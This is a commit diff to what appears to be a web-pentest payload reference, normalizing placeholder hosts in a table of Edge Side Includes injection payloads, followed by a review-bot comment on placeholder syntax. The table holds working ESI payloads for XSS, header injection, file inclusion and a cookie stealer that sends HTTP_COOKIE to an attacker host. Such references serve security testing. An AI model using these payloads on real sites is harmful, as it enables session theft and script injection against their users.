Normalize commands, callbacks and references

Swissky
2026-04-22 15:03:31 +02:00
parent a79b1f5692
commit d4e6eda4ad
17 changed files with 114 additions and 114 deletions

@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
| Description | Payload |
| ----------------------- | ---------------------------------------- |
| Blind detection | `<esi:include src=http://attacker.com>` |
| XSS | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Blind detection | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>` |
| XSS | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
| Cookie stealer | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
| Include a file | `<esi:include src="supersecret.txt">` |
| Display debug info | `<esi:debug/>` |
| Add header | `<!--esi $add_header('Location','http://attacker.com') -->` |
| Add header | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
| Inline fragment | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
| Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
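Review bot: The new `[ATTACKER.DOMAIN.TLD]` placeholder sits in the host position of the `src` URLs (Blind detection, XSS, Cookie stealer rows) and of the `$add_header('Location', ...)` value, where square brackets are the URL syntax for an IPv6 literal, so a row pasted into a URL parser or test fixture without substitution fails as a malformed host instead of reading as an obvious placeholder. Since this change normalizes the convention, state it once above the table (bracketed upper-case tokens are to be replaced before use) and bring `XSSPAYLOAD.html` in the XSS row under the same convention, since it remains a bare upper-case placeholder. The changed rows also leave `src` unquoted while the `Include a file` row uses `src="supersecret.txt"`; pick one form for the whole table.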